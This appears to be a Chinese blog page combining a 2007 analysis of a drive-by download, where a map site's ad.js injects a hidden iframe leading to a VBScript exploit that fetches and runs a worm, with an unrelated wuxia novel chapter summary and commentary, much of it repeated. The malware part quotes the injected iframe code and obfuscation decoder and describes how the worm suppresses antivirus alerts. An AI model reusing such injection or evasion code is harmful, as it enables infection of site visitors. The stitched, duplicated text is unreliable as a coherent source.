endurer 原创2007-03-05 第1版
打开该城市地图网站的网页,瑞星警告发现:Hack.Exploit.Vml.g。
检查网页,发现网页所引用的 images/ad.js 包含代码:/---document.writeln("<iframe src=\"hxxp:\/\/m***m**.k****is*163.com\/index.html?id=5 \" width=0 height=0><\/iframe>");---/
hxxp://m***m**.k****is*163.com/index.html?id=5 包含代码:/---<iframe src="hxxp://web***.7***72*7***6.com/*0****.htm" width="0" height="0" frameborder="0"></iframe>---/
hxxp://web***.7***72*7***6.com/*0****.htm 的标题为http NO FOUND,内容为VBScript脚本代码,功能是调用自定义函数:/----function rechange(k)s=Split(k,",")t=""For i = 0 To UBound(s)t=t+Chr(eval(s(i)))Nextrechange=tEnd Function----/对变量t的值进行解密并调用execute()执行。
解密后的代码是VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : D:\test\0.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:33:14修改时间 : 2007-3-5 12:33:14访问时间 : 2007-3-5 12:34:20大小 : 93240 字节 91.56 KBMD5 : ef70c5791d050cc898319acbb044e847
Kaspersky 报为 Worm.Win32.Viking.ii
0.exe运行后会下载其它恶意文件并感染EXE文件。
下面是0.exe运行后Kaspersky 6的记录:/----已检测到: 风险软件 Trojan.generic 运行进程: D:\test\0.exe已检测到: 木马程序 Trojan-PSW.Win32.Magania.jm 文件: C:\WINNT\system32\wincab.sys已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\WINNT\SMSS.EXE已检测到: 风险软件 Invader 运行进程: C:\WINNT\SVCHOST.EXE已检测到: 风险软件 Invader (loader) 运行进程: C:\WINNT\explorer.exe已检测到: 木马程序 Backdoor.Win32.Agent.alh 文件: C:\WINNT\system32\systemt.exe/UPack已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.gs 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\ATKZUDI5\smsss[1].exe已检测到: 木马程序 Trojan.Win32.Agent.abf 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\276BATUZ\lsasss[1].exe/PE_Patch/UPack已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\CX67WL2N\avg[1].exe已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\WINNT\CSRSS.exe已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\MUT33WP4\datsc[1].exe已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:\WINNT\10Sy.exe已检测到: 木马程序 Trojan-PSW.Win32.WOW.ec 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\O56R812F\adobesvc[1].exe已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\E1ITG5SV\svchots[1].exe已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\9ULFUMAW\mstcs[1].exe----/
值得注意的是,病毒会搜索标题为AVP.AlertDialog的 Kaspersky 的警告窗口,模拟点击按钮“允许”和“跳过”向 Kaspersky 的通知窗口(类名为:AVP.Product_Notification)发送WM_CLOSE消息结束该窗口。
所以用户无法进行操作。
用pe_xscan扫描,发现可疑项:/---pe_xscan by Purple Endurer2007-3-5 12:44:24Windows 2000 Service Pack 4(5.0.2195)管理员用户组
[System Process] * 0 C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\Explorer.EXE * 928 2003-6-20 3:5:4 Microsoft(R) Windows (R) 2000 Operating System 5.00.3700.6690 Windows Explorer Copyright (C) Microsoft Corp. 1981-1999 5.00.3700.6690 Microsoft Corporation ? explorer EXPLORER.EXE C:\WINNT\RichDll.dll 2007-3-5 12:37:41 C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\system32\internat.exe * 1176 2000-1-10 20:0:0 Microsoft(R) Windows (R) 2000 Operating System 5.00.2920.0000 Keyboard Language Indicator Applet Copyright (C) Microsoft Corp. 1994-1999 5.00.2920.0000 Microsoft Corporation ? INTERNAT INTERNAT.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\Program Files\Tencent\qq\QQ.exe * 516 2006-3-2 8:52:30 TENCENT QQ 0, 0, 0, 0 QQ Copyright ? 2005 0, 0, 0, 0 TENCENT COMQQD QQ.exe C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\Program Files\Maxthon\Maxthon.exe * 904 2007-2-11 17:46:2 Maxthon Application 1, 5, 9, 80 Maxthon Web Browser Copyright (C) 2002 1, 5, 9, 80 Maxthon International Ltd. Maxthon Maxthon Maxthon.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\Program Files\EditPlus 2\editplus.exe * 588 2005-12-12 9:32:12 EditPlus 2, 2, 1, 330 EditPlus Copyright ? 1998-2005 ES-Computing 2, 2, 1, 330 ES-Computing EditPlus EditPlus EDITPLUS.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\system32\notepad.exe * 508 2000-1-10 20:0:0 Microsoft(R) Windows (R) 2000 Operating System 5.00.2140.1 记事本 Copyright (C) Microsoft Corp. 1981-1999 5.00.2140.1 Microsoft Corporation ? Notepad NOTEPAD.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\system32\conime.exe * 1476 2003-6-20 3:5:4 Microsoft(R) Windows (R) 2000 Operating System 5.00.2195.6655 Console IME Copyright (C) Microsoft Corp. 1981-1999 5.00.2195.6655 Microsoft Corporation ? Console CONIME.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\pe\tools\3.exe * 1508 2007-3-5 12:43:37 C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47
O4 - HKLM\..\Run: [wsttrs] C:\WINNT\SVCHOST.EXE
O23 - 服务: shiji (shiji) - C:\WINNT\system32\wincab.sys(手动启动)---/
文件说明符 : C:\WINNT\system32\wsttrs.dll属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:47修改时间 : 2007-3-5 12:37:47访问时间 : 2007-3-5 13:35:18大小 : 23539 字节 22.1011 KBMD5 : 6e25ea101a59463623725d6073058dc1
Kaspersky 报为: Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.WLOnline.jcv
文件说明符 : C:\WINNT\RichDll.dll属性 : ----获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:41修改时间 : 2007-3-5 12:37:41访问时间 : 2007-3-5 13:38:25大小 : 29721 字节 29.25 KBMD5 : a936b1dba52bbbc79cf23f9d965d2646
Kaspersky 报为: Worm.Win32.Viking.ii
文件说明符 : C:\WINNT\SVCHOST.EXE属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:46修改时间 : 2007-3-5 12:37:46访问时间 : 2007-3-5 13:39:4大小 : 69859 字节 68.227 KBMD5 : 2424f02a0ea72ffeae27f8b33fb5dfc9
Kaspersky 报为:Trojan-PSW.Win32.Magania.jm.1瑞星报为:Trojan.PSW.Roc.ad
文件说明符 : c:\WINNT\10Sy.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:15修改时间 : 2007-3-5 13:47:44访问时间 : 2007-3-5 13:49:17大小 : 25072 字节 24.496 KBMD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky 报为:Trojan-Downloader.Win32.Small.czl瑞星 报为:Trojan.PSW.LMir.mdw
文件说明符 : C:\WINNT\system32\systemt.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:56修改时间 : 2007-3-5 12:59:27访问时间 : 2007-3-5 13:0:32大小 : 26130 字节 25.530 KBMD5 : 8ae1afdb6a25569a5d55a4eb5389121c
Kaspersky报为: Backdoor.Win32.Agent.alh
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temp\q9xtwt5.dll属性 : ASH-获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:46修改时间 : 2007-3-5 12:37:46访问时间 : 2007-3-5 11:6:31大小 : 32483 字节 31.739 KBMD5 : b19d0273f347ed7e3dc4fb95a70f48a4
Kaspersky报为:Trojan-PSW.Win32.Magania.jm.1瑞星报为:RootKit.Vanti.vr
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\ATKZUDI5\web[1].DLL属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:59:1修改时间 : 2007-3-5 12:59:1访问时间 : 2007-3-5 13:27:43大小 : 17227 字节 16.843 KBMD5 : c68f384f846fc5943e8470ff37d9111d
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\ATKZUDI5\smsss[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:57修改时间 : 2007-3-5 12:37:59访问时间 : 2007-3-5 13:25:55大小 : 13824 字节 13.512 KBMD5 : 3f864049a2fde64042a82565d4ff92af
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.gs瑞星报为:Trojan.PSW.ZhengTu.anc
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\276BATUZ\lsasss[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:0修改时间 : 2007-3-5 12:38:1访问时间 : 2007-3-5 13:23:29大小 : 40968 字节 40.8 KBMD5 : 23f203134804fa6f2d31667267595dc5
Kaspersky 报为:Trojan.Win32.Agent.abf瑞星报为::Trojan.Agent.fii
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\CX67WL2N\avg[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:43修改时间 : 2007-3-5 12:38:6访问时间 : 2007-3-5 13:21:48大小 : 13824 字节 13.512 KBMD5 : 3cec40cb6a2ba1e57c91a083c10b09e4
此文件会复制为:c:\WINNT\SMSS.EXE
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.es瑞星 报为:Trojan.PSW.OnlineGames.in
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\MUT33WP4\datsc[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:10修改时间 : 2007-3-5 12:38:10访问时间 : 2007-3-5 13:17:19大小 : 13824 字节 13.512 KBMD5 : a9b8b545f24b36e52fd0176db42becdd
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es瑞星报为::Trojan.PSW.Agent.jdm
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\O56R812F\adobesvc[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:25修改时间 : 2007-3-5 13:38:28访问时间 : 2007-3-5 13:15:18大小 : 226868 字节 221.564 KBMD5 : 54ce2ffabb6ddefd26d5360d427870c2
Kaspersky报为:Trojan-PSW.Win32.WOW.ec
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\E1ITG5SV\svchots[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:6修改时间 : 2007-3-5 12:38:32访问时间 : 2007-3-5 13:13:13大小 : 14848 字节 14.512 KBMD5 : a4742619bf2f16aed92fdc8623ad0623
此文件被复制为:c:\WINNT\CSRSS.exe
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\9ULFUMAW\inetinf[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:49修改时间 : 2007-3-5 12:37:55访问时间 : 2007-3-5 13:11:9大小 : 279652 字节 273.100 KBMD5 : 10a390602afad9926028116607ac094a
此文件被复制为c:\WINNT\SERVICES.EXE
Kaspersky 报为:Backdoor.Win32.Agent.alh
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\9ULFUMAW\mstcs[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:14修改时间 : 2007-3-5 13:9:58访问时间 : 2007-3-5 13:10:36大小 : 25072 字节 24.496 KBMD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky报为:Trojan-Downloader.Win32.Small.czl瑞星报为:Trojan.PSW.LMir.mdw
2007年3月6日星期二
大侠狄龙子 3回 概要、endurer评注 黄桶庙雷霄两绊沈煌 老龙场唐方三镖射李均
第三回俊眼识英雄 酒肆挥金怀古哲凌空飞倩影 山亭密语见天人
沈煌去黄桶庙吃素面,被黄桶庙方丈普静的好友花子雷四绊了两次。 归途在道旁小酒铺见花子雷四为了酒后无钱,欠账不允而争吵,代付酒钱。雷四随口怒叱沈煌多给钱。 沈煌回船,冰如说雷四性情甚怪,早晚他必寻沈煌。 夜饭后,文麟、沈煌船头闲眺,远远天空中忽飞起一串红绿火星,岸上竹林旁有两条黑影如飞驰过,往那流星起处赶去,紧跟着又有一条白衣人影一闪不见,似朝前两黑衣人追去。 冰如带煌儿往老龙场谢善人家去。 船家见雷四在岸上探头探脑,出声喝骂,被戏弄。文麟实言相告,雷四自去。 冰如对沈煌说,山梁子(霸王村)主人龙腾与谢善人原是对头,前日双方手下人又因行猎争执动武,遇一高僧点化排解,本已言归于好,中有数人均是主人至交,先是夙仇,在此相遇,定要决一存亡胜败。冰如朋友沈老先生年老,恐非对头江洋大盗杨冲之敌。杨冲请来昔年乃西川四凶之一,退隐三十年的铁帽真人缪三玄。缪三玄是冲对方人中的对头高僧胞侄而来。缪三玄想收一个好徒弟再关山门,就许看中沈煌,不可和他硬抗。 冰如带沈煌绕往右面溪旁山坡之上藏好自去。 主人说杨冲暗用手法,抽了红签,放起自带九龙火箭信号,明和沈老英雄势不两立。情知双方恶斗难免,正打不起主意,忽有人送来一信,大意说缪三玄在离此三十里的黄牛坝等候,一见杨冲九龙火箭信号立时赶来。当晚有一异人因愤缪、杨二贼凶横,有事难于赶到相助,另约一人将缪三玄绊住,不令早到。下未署名,只画着八口小剑。便照所说行事。 杨冲见双方已有七八起人相继比过,缪三玄始终未见,不由盛气一馁。 沈老先生用“金鸡独立”之势,单腿站在竹竿顶上,无形影铁手雷霄挟着两个十三四岁的男女幼童,踏树而上至离地五六丈的树枝之上,让二章坐稳,飘堕入林。 沈老先生在竹竿顶上,发话叫阵,语带讥嘲。 杨冲发现男女两幼童头上多出昔年九侠中的八仙剑李均。 杨冲贼党唐方见杨冲欲前又怯,隔席飞起,扯顺风旗,拿大鼎,朝天一至香,立在竹竿顶上向前发话。 左侧树枝上幼女笑说来了一个跑马卖解的,叫唐方趁此下台,还免丢人。见唐方骂她“小狗丫头”,要出手被她爹李均阻止。 唐方朝少女打出一粒钢丸。李均收去钢丸,挑战。唐方见李均稳立在树梢头上,随着秋风摇晃起伏,惊其轻功,右手钢镖,左手连珠飞弹,右膝暗藏裤内的梅花飞蝗弩也相继发出。 唐方朝少女打出一粒钢丸。李均收去钢丸,下树挑战。唐方见李均稳立在树梢头上,随着秋风摇晃起伏,惊其轻功,右手钢镖,左手连珠飞弹,同时右腿一抬,就着钢丸发出之势,朝膝头上一拍,右膝暗藏裤内的梅花飞蝗弩也相继发出。忽听哈哈一笑,所发暗器竟被一股扑面疾风反激回来,身上连痛带麻中了好几下,站立不稳。 缪三玄同了四五个徒党纵落场中和关中九侠出场斗将起来。 沈煌在土坡独坐山石之上见上场诸人无一人能够赶上慧圆老尼,本意去往溪边,看那刀枪架上有何出奇兵器,在坡后发现山崖亭中坐着八仙剑李均、李明霞父女二人。李明霞飞下,诈沈煌说出听到之言。沈煌见李明霞美貌,由不得心生爱好。李均将明霞唤回,单手提一个两尺多高的大葫芦下坡取水。 沈煌心想亲近,要代将葫芦送上亭去,有人发话,却不见人。
endurer评注
不知铁帽真人缪三玄的对头高僧是谁?龙腾与谢善人点化排解的高僧又是谁?
唐方露的一手功夫倒也精彩……
缘来如此/--- 定睛一看,正是山亭上所坐白衣少女,先就觉出对方貌相极美,人又清秀,这一对面,更看出那少女生得明眸皓齿,美艳若仙,年纪也和自己相等,由不得心生爱好…… 沈煌知被诈去,又愧又急,无言可答,平日奉有母命,不许和人争吵,又因对方容光美艳,幼童心情,虽无他念,无形中却生出一种纯洁之爱,不愿使她生气……沈煌外和内刚,素来不愿向人服低,不知怎的,对于少女竟强不起来…… 沈煌见对方如此美秀,本领又高,更起了一种微妙感觉,心中恋恋,不舍走去,又恐相隔太近,少女怪他偷听,只得走到前面寻一山石坐下,心中深印着少女飞身时婷婷倩影,恨不能再见一面,但又无法接近,不住低头寻思,朝上偷看……跟着便见少女手捧一个两尺多高的大葫芦走下坡来,心方一喜,不料走的是相反方,没朝自己看一眼,有心跟去,又恐触怒,心正失望---/
[庙]黄桶庙:素面甚好……庙门虚掩,门内有一株大黄桶树,荫覆亩许,禅关清静,也无什游人香火,对面大殿黑影中矗立着几尊佛像,佛前一盏神灯,映得佛头金脸上秋虫乱飞,静沉沉的悄无人声……当地是座古庙,连方丈师徒四人,平日无什香火,也不应佛事,全仗庙后十来亩薄田勉强度日,十分清苦
[人]无形影铁手雷霄/雷四先生:一身材瘦小的老花子……身上只穿着一件黄葛布的短衣,甚是破旧,这一翻身,前襟被风吹开,那么又黑又瘦的一张脸,自颈以下,身上皮肤竟玉也似白,看去十分清洁,不似寻常花子风尘肮脏污秽神气,下穿黄葛裤子和一双藤鞋,只管破旧,也不见有尘污,越看越觉与寻常花子不类……家师(普静)好友雷四先生,因他老人家性情古怪,素来又贪睡,且不择地方,常在梦中伸腿踢人,睡相不好,但有一桩奇处,当他睡处有人经过,如被他踢中的,这人将来必有好处。……论他年纪,当在百岁以外,听江湖上老年人传说,数十年来形貌不曾变过,便是昔年无心相遇,相隔也将近一二十年,今夜看他,还是初见时神情,只是身材瘦小了些。此老性情古怪,专重感情,无故从不出手,但盼今夜只作旁观,否则万非其敌。
[人]普静:黄桶庙方丈。一位有道行的高僧
[人]元相:黄桶庙小沙弥。生得眉清目秀,甚是灵慧
[典]《汉书》圮桥三进履《汉书·张良传》载,汉朝名臣张良出道前,在圯桥遇仙人黄石公。黄为考验张良,故意将自己所穿鞋子三次丢入桥下,而张不厌其烦,三次下桥为黄拾鞋,最终感动黄石公,得授“真传”而成就事业。
[人]周文麟:禀赋甚好,又是童身,真气内蕴,颇为纯厚。
[宝]杨冲九龙火箭信号:远远天空中忽飞起一串红绿火星……比新年所见寻常“炮打灯”、“流星赶月”等花炮要大得多,红绿二色作一串飞起,为数竟达二十余个,由东方远处直射天空,离地数十丈忽然爆散,化为二三十蓬火雨满空飞射,方始消灭,十分好看,
师从高人有利有弊:这类有本事的高人,小相公拜他为师固然是好,也有坏处,因为这类人多有对头,一个不巧便要受他连累。
[人]王老么:船家之一,性情最暴
[人]沈煌:年纪虽轻,人却聪明机警……以你聪明美质,休看年幼,只肯用功,至多三五年中必有成就……外和内刚,素来不愿向人服低
[地]山梁子:又叫霸王村,主人龙腾,今夜与人比武。山梁东边有一片园林,乃我(沈冰如)方才船上所说谢善人山中别墅,备作消夏之用。……梁那面乃是一片平地,山梁在旁,正面是一高山。山前有数十家房舍,对面大片平野田园,中有两道小溪。当中广场上陈列着数十座酒席,四围点满纱灯,奇石罗列,无数松杉环绕广场外围,内一宽约五六丈的大溪,由斜对面田野中蜿蜒而来;由广场中心穿越过去,水流甚急,月光照去,银练也似。两岸树上也有不少纱灯,溪旁放着两排衣架和桌椅之类。
[人]龙腾:山梁子(霸王村)主人。洗手多年的侠盗……虽然出身绿林,专一劫富济贫,也未妄杀一人,归隐之后更作了不少善事……身材高大年约六旬的长髯老者
[人]谢善人:当地财主,平素好武好友,周济贫穷,人虽善良,为喜结纳江湖豪俊,家中也养有不少会武功的能手。……少年英侠……年约三旬,是个白面书生,面容清秀
[人]杨冲:江洋大盗,伤人甚众。为了劫杀行旅,被我(沈冰如)朋友打败,羞恼怀恨,由此洗手,连下数年苦功,练成一身惊人本领和极厉害的暗器,到处寻找我那朋友报仇,均未寻见。龙腾和他相交多年
[人]铁帽真人缪三玄:西川路上一个退隐多年的有名人物……昔年乃西川四凶之一,也为作恶横行,被一高僧打败,由此退隐,出家已三十年,武功极好,从小到老,一直不曾间断,平日戴一铁帽,偶出云游,已不再向人伸手,表面痛改前非,实为那位高僧尚在人间……以前虽然凶横暴戾手狠心黑,伤人甚多,但对常人决不杀害,所劫行旅富家也有分寸,因人而施,从未抢劫善良……自在成都桂湖的左近建了一所道观,在内出家,作为归隐,看去似个三清教下有道之士,本心却是仇恨太深,无计报复,不敢再犯旧恶,自取灭亡,偏又量小性刚,明知此仇难报,仍作万一之想,每日背人苦练,寒暑不断。……内外功均到上乘境界,不是寻常所能抵敌……虽极凶横,但他性情古怪,最是爱才……素来恃强好胜……素来强横,决不藏头缩尾,所戴铁帽和那一身非僧非道的服装一望即知
[人]高僧言出必行,对头天生神力,具有一身惊人本领,炼就罡气,无人能敌……从小出家,俗家只一胞弟,生此一子
[人]沈老先生:百尺竿头洒金钱
[人]姚人英:杨冲新近结纳的北五省绿林中的高手,都是少年气盛,自恃武功
[人]唐方:杨冲新近结纳的北五省绿林中的高手,都是少年气盛,自恃武功……恃强性暴……右手钢镖,左手连珠飞弹,同时右腿一抬,就着钢丸发出之势,朝膝头上一拍,右膝暗藏裤内的梅花飞蝗弩也相继发出。唐方素来手狠心毒,仗着一身武功和这三件暗器,横行北五省已有多年……那飞蝗弩专破气功,打人五官要穴,见血封喉,一任对方多好硬功中上也难活命
[人]李明霞:八仙剑李均之女。……少女穿着一身青罗衫,腰系丝绦,上挂二尺短剑和一镖囊,右肩还斜插着一件奇怪兵刃,看年纪不过十二三岁,生得清秀非常……体态轻盈,丰神明艳,月光之下,望之若仙,……(沈煌)先就觉出对方貌相极美,人又清秀,这一对面,更看出那少女生得明眸皓齿,美艳若仙,年纪也和(沈煌)自己相等……从小便得你干娘怜爱,恨不能把她全身本领一齐传授,于是目中无人
[人]八仙剑李均:昔年关中九侠之一……腰围的白丝绦和那短仅尺许、金光闪闪的八口小剑……是个中等身材、腰围八口小金剑的白面书生……看年纪虽只三四十岁,实则关中九侠自在秦岭合诛猛禽火鹫、巧得灵木芝,同服以后俱享上寿,此时年纪已在九旬以上
旧雨楼·还珠楼主《大侠狄龙子》 全文
沈煌去黄桶庙吃素面,被黄桶庙方丈普静的好友花子雷四绊了两次。 归途在道旁小酒铺见花子雷四为了酒后无钱,欠账不允而争吵,代付酒钱。雷四随口怒叱沈煌多给钱。 沈煌回船,冰如说雷四性情甚怪,早晚他必寻沈煌。 夜饭后,文麟、沈煌船头闲眺,远远天空中忽飞起一串红绿火星,岸上竹林旁有两条黑影如飞驰过,往那流星起处赶去,紧跟着又有一条白衣人影一闪不见,似朝前两黑衣人追去。 冰如带煌儿往老龙场谢善人家去。 船家见雷四在岸上探头探脑,出声喝骂,被戏弄。文麟实言相告,雷四自去。 冰如对沈煌说,山梁子(霸王村)主人龙腾与谢善人原是对头,前日双方手下人又因行猎争执动武,遇一高僧点化排解,本已言归于好,中有数人均是主人至交,先是夙仇,在此相遇,定要决一存亡胜败。冰如朋友沈老先生年老,恐非对头江洋大盗杨冲之敌。杨冲请来昔年乃西川四凶之一,退隐三十年的铁帽真人缪三玄。缪三玄是冲对方人中的对头高僧胞侄而来。缪三玄想收一个好徒弟再关山门,就许看中沈煌,不可和他硬抗。 冰如带沈煌绕往右面溪旁山坡之上藏好自去。 主人说杨冲暗用手法,抽了红签,放起自带九龙火箭信号,明和沈老英雄势不两立。情知双方恶斗难免,正打不起主意,忽有人送来一信,大意说缪三玄在离此三十里的黄牛坝等候,一见杨冲九龙火箭信号立时赶来。当晚有一异人因愤缪、杨二贼凶横,有事难于赶到相助,另约一人将缪三玄绊住,不令早到。下未署名,只画着八口小剑。便照所说行事。 杨冲见双方已有七八起人相继比过,缪三玄始终未见,不由盛气一馁。 沈老先生用“金鸡独立”之势,单腿站在竹竿顶上,无形影铁手雷霄挟着两个十三四岁的男女幼童,踏树而上至离地五六丈的树枝之上,让二章坐稳,飘堕入林。 沈老先生在竹竿顶上,发话叫阵,语带讥嘲。 杨冲发现男女两幼童头上多出昔年九侠中的八仙剑李均。 杨冲贼党唐方见杨冲欲前又怯,隔席飞起,扯顺风旗,拿大鼎,朝天一至香,立在竹竿顶上向前发话。 左侧树枝上幼女笑说来了一个跑马卖解的,叫唐方趁此下台,还免丢人。见唐方骂她“小狗丫头”,要出手被她爹李均阻止。 唐方朝少女打出一粒钢丸。李均收去钢丸,挑战。唐方见李均稳立在树梢头上,随着秋风摇晃起伏,惊其轻功,右手钢镖,左手连珠飞弹,右膝暗藏裤内的梅花飞蝗弩也相继发出。 唐方朝少女打出一粒钢丸。李均收去钢丸,下树挑战。唐方见李均稳立在树梢头上,随着秋风摇晃起伏,惊其轻功,右手钢镖,左手连珠飞弹,同时右腿一抬,就着钢丸发出之势,朝膝头上一拍,右膝暗藏裤内的梅花飞蝗弩也相继发出。忽听哈哈一笑,所发暗器竟被一股扑面疾风反激回来,身上连痛带麻中了好几下,站立不稳。 缪三玄同了四五个徒党纵落场中和关中九侠出场斗将起来。 沈煌在土坡独坐山石之上见上场诸人无一人能够赶上慧圆老尼,本意去往溪边,看那刀枪架上有何出奇兵器,在坡后发现山崖亭中坐着八仙剑李均、李明霞父女二人。李明霞飞下,诈沈煌说出听到之言。沈煌见李明霞美貌,由不得心生爱好。李均将明霞唤回,单手提一个两尺多高的大葫芦下坡取水。 沈煌心想亲近,要代将葫芦送上亭去,有人发话,却不见人。
endurer评注
不知铁帽真人缪三玄的对头高僧是谁?龙腾与谢善人点化排解的高僧又是谁?
唐方露的一手功夫倒也精彩……
缘来如此/--- 定睛一看,正是山亭上所坐白衣少女,先就觉出对方貌相极美,人又清秀,这一对面,更看出那少女生得明眸皓齿,美艳若仙,年纪也和自己相等,由不得心生爱好…… 沈煌知被诈去,又愧又急,无言可答,平日奉有母命,不许和人争吵,又因对方容光美艳,幼童心情,虽无他念,无形中却生出一种纯洁之爱,不愿使她生气……沈煌外和内刚,素来不愿向人服低,不知怎的,对于少女竟强不起来…… 沈煌见对方如此美秀,本领又高,更起了一种微妙感觉,心中恋恋,不舍走去,又恐相隔太近,少女怪他偷听,只得走到前面寻一山石坐下,心中深印着少女飞身时婷婷倩影,恨不能再见一面,但又无法接近,不住低头寻思,朝上偷看……跟着便见少女手捧一个两尺多高的大葫芦走下坡来,心方一喜,不料走的是相反方,没朝自己看一眼,有心跟去,又恐触怒,心正失望---/
[庙]黄桶庙:素面甚好……庙门虚掩,门内有一株大黄桶树,荫覆亩许,禅关清静,也无什游人香火,对面大殿黑影中矗立着几尊佛像,佛前一盏神灯,映得佛头金脸上秋虫乱飞,静沉沉的悄无人声……当地是座古庙,连方丈师徒四人,平日无什香火,也不应佛事,全仗庙后十来亩薄田勉强度日,十分清苦
[人]无形影铁手雷霄/雷四先生:一身材瘦小的老花子……身上只穿着一件黄葛布的短衣,甚是破旧,这一翻身,前襟被风吹开,那么又黑又瘦的一张脸,自颈以下,身上皮肤竟玉也似白,看去十分清洁,不似寻常花子风尘肮脏污秽神气,下穿黄葛裤子和一双藤鞋,只管破旧,也不见有尘污,越看越觉与寻常花子不类……家师(普静)好友雷四先生,因他老人家性情古怪,素来又贪睡,且不择地方,常在梦中伸腿踢人,睡相不好,但有一桩奇处,当他睡处有人经过,如被他踢中的,这人将来必有好处。……论他年纪,当在百岁以外,听江湖上老年人传说,数十年来形貌不曾变过,便是昔年无心相遇,相隔也将近一二十年,今夜看他,还是初见时神情,只是身材瘦小了些。此老性情古怪,专重感情,无故从不出手,但盼今夜只作旁观,否则万非其敌。
[人]普静:黄桶庙方丈。一位有道行的高僧
[人]元相:黄桶庙小沙弥。生得眉清目秀,甚是灵慧
[典]《汉书》圮桥三进履《汉书·张良传》载,汉朝名臣张良出道前,在圯桥遇仙人黄石公。黄为考验张良,故意将自己所穿鞋子三次丢入桥下,而张不厌其烦,三次下桥为黄拾鞋,最终感动黄石公,得授“真传”而成就事业。
[人]周文麟:禀赋甚好,又是童身,真气内蕴,颇为纯厚。
[宝]杨冲九龙火箭信号:远远天空中忽飞起一串红绿火星……比新年所见寻常“炮打灯”、“流星赶月”等花炮要大得多,红绿二色作一串飞起,为数竟达二十余个,由东方远处直射天空,离地数十丈忽然爆散,化为二三十蓬火雨满空飞射,方始消灭,十分好看,
师从高人有利有弊:这类有本事的高人,小相公拜他为师固然是好,也有坏处,因为这类人多有对头,一个不巧便要受他连累。
[人]王老么:船家之一,性情最暴
[人]沈煌:年纪虽轻,人却聪明机警……以你聪明美质,休看年幼,只肯用功,至多三五年中必有成就……外和内刚,素来不愿向人服低
[地]山梁子:又叫霸王村,主人龙腾,今夜与人比武。山梁东边有一片园林,乃我(沈冰如)方才船上所说谢善人山中别墅,备作消夏之用。……梁那面乃是一片平地,山梁在旁,正面是一高山。山前有数十家房舍,对面大片平野田园,中有两道小溪。当中广场上陈列着数十座酒席,四围点满纱灯,奇石罗列,无数松杉环绕广场外围,内一宽约五六丈的大溪,由斜对面田野中蜿蜒而来;由广场中心穿越过去,水流甚急,月光照去,银练也似。两岸树上也有不少纱灯,溪旁放着两排衣架和桌椅之类。
